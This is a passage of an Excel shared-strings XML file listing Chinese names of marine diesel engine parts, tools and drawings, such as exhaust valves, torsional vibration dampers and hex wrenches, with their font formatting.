        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损颗粒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损颗粒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>例</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损颗粒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>例</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损量量规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损设备布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨削工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>母线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木料型材</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木箱底</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木箱盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钼</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耐压软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性齿轮安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性钢管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性接头的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性连轴节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性外接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部导向砂轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外侧锥型导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部管安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部滑油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部通风管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部通讯系统控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内侧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内侧锥型导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内经极限规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内链节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角扳手套装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角固定螺丝用键和工具箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角头紧配螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角圆柱头螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内容表格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尼龙球</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尼龙塞子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逆时针滑油泵的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逆时针推力块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逆时针推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逆振器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镍铜管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拧紧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拧紧和润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩计使用说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力仪布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力振动减振器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振监测系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振减振器液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振减振器油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放测量步骤</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧机架管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧上部主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧上部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧上部走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧上平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧下部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧中部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧中层走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气衬套萃取器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气出口布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气出口管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气促动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Y56F</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气定压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气定压管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气定压管工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气定压管局部组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气伐螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀，管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀，上部部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀，下部部件详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀穿孔管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀促动泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀底座质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀定距管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀对焊法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀额外工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆滚压生产说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工作台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工作台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀及冷却水接管的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
